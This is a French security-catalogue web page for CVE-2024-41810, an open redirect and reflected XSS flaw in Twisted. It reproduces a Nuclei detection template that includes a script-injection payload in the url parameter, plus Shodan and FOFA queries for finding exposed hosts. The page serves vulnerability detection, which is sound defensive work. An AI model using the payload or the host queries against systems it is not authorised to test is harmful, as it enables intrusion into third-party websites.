Aller au contenu
Appaloosa Scout
Sélection de la langue
fr en

Exploit matérialisé

CVE-2024-41810

MEDIUM

1 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.

À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
Nuclei medium Vérifié
Source

Twisted - Open Redirect & XSS

Par projectdiscovery

Comment tester cet exploit

Le template Nuclei EST le test : une règle de détection exécutable. Installez nuclei, puis lancez-le contre une cible que vous contrôlez.

nuclei -id CVE-2024-41810 -u https://your-target

Template yaml

id: CVE-2024-41810

info:
  name: Twisted - Open Redirect & XSS
  author: KoYejune0302,cheoljun99,sim4110,gy741
  severity: medium
  description: |
    Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. This template tests for an open redirect and XSS vulnerability in the URL parameter. This vulnerability is fixed in 24.7.0rc1.
  impact: |
    Attackers can exploit open redirect and reflected XSS via the redirect URL parameter in the Twisted web framework.
  remediation: |
    Update Twisted to version 24.7.0rc1 or later.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-41810
    epss-score: 0.01176
    epss-percentile: 0.65368
    cpe: cpe:2.3:a:twistedmatrix:twisted:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/advisories/GHSA-cf56-g6w6-pqq2
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41810
  metadata:
    max-request: 2
    shodan-query: html:'Twisted' html:"python"
    fofa-query: body="twisted" && "python"
  tags: xss,redirect,twisted,python,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: response
        words:
          - "TWISTED_SESSION"
          - '["Twisted'
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}?url=ws://example.com/"><script>alert(document.domain)</script>'

    redirects: true
    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - 'Location: ws://example.com/"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 302
# digest: 4a0a00473045022100c2ebf2dea5f51bc9e2caf872bb10bee75e51af77cda3be3168ac517996e4869a02201b89d1f1bdf482bd81f16b5551996e96d0f7eca3b6e307d7e467bfecabc80fea:922c64590222798bb761d5b6d8e72950